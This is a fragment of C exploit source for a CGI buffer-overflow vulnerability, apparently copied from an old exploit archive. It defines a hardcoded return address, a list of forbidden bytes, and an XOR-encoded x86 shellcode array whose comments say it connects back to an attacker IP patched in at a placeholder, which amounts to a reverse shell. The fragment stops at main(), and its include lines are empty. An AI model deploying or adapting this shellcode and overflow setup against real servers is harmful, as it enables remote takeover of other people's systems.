|
CGI漏洞(24) #include
#include
#include #define FORBIDDEN "\x00\x09\x0b\x0c\r\n{};<>\\^()*[]$`&#~\""
#define SZ_SOURCEBUF 256
#define SZ_FILEBUF 256
#define RETADDY 0xbffff910 /* Works on my cute `lil box */ int wwwconnect(unsigned long ip);
int ICinInt(long, char *, size_t);
char *buildOverflow(unsigned long, unsigned int);
void *xmalloc(size_t); /*
Shellcode written by: Scrippie Smegma v0.5 ridded this shellcode of the following characters:
"\x00\x09\x0b\x0c\r\n{};<>\\^()*[]$`&#~\"" For this purpose a xor mask of 0x92011e11 was brute forced
*/ char hellcode[] =
"\xeb\x14\x58\x89\xc6\x31\xc9\xb1\x25\x81\x36\x11\x1e\x01\x92\x83\xc6\x04\xe2"
"\xf5\xeb\x05\xe8\xe7\xff\xff\xff\xfa\x64\x5f\xa3\xd1\x2f\xda\xa3\xc3\xae\x67"
"\x21\x10\x93\x4f\x8e\xa3\x1f\x88\xc4\x31\xac\x07\x1b\x47\x3a\xb3\x90\x98\x48"
"\x1d\x5f\x91\x97\x47\x8a\x98\x08\x67\x55\x57\x1c\x68\xe8\x98\x58\x1d\x1f\x17"
"\x97\x47\xb2\x91\xdc\x0f\x1b\x47\x3a\x30\x52\x15\x78\x81\x51\x13\x93\x4f\x8e"
"\xdc\x9e\x30\x52\x15\x21\x88\x50\x9a\x40\x19\xa3\xd8\xd3\x81\x1b\xc1\x5f\xcc"
"\x12\x98\xce\x40\x5f\x91\x2f\xc1\x1f\x6f\x11\x81\x53\x16\xed\xab\x96\x1a\x93"
"\x5f\x9a\x98\x40\x11\x1f\x5f\x0e\x30\x40\xdc\x9e\x30\x52\xef\xde\xcc\x12\xf9"
"\x9f\xfe\x6d\xee\x5f\x40\xd0\x53\xAA\xAA\xAA\xAA\x31\x63\xfb\x7f\x31\x72\xfa"; /* The IP address to connect to is gonna be at 0xAAAAAAAA */
/* Make sure it‘s encoded just as the shellcode is */ int main(int argc, char **argv)
| 
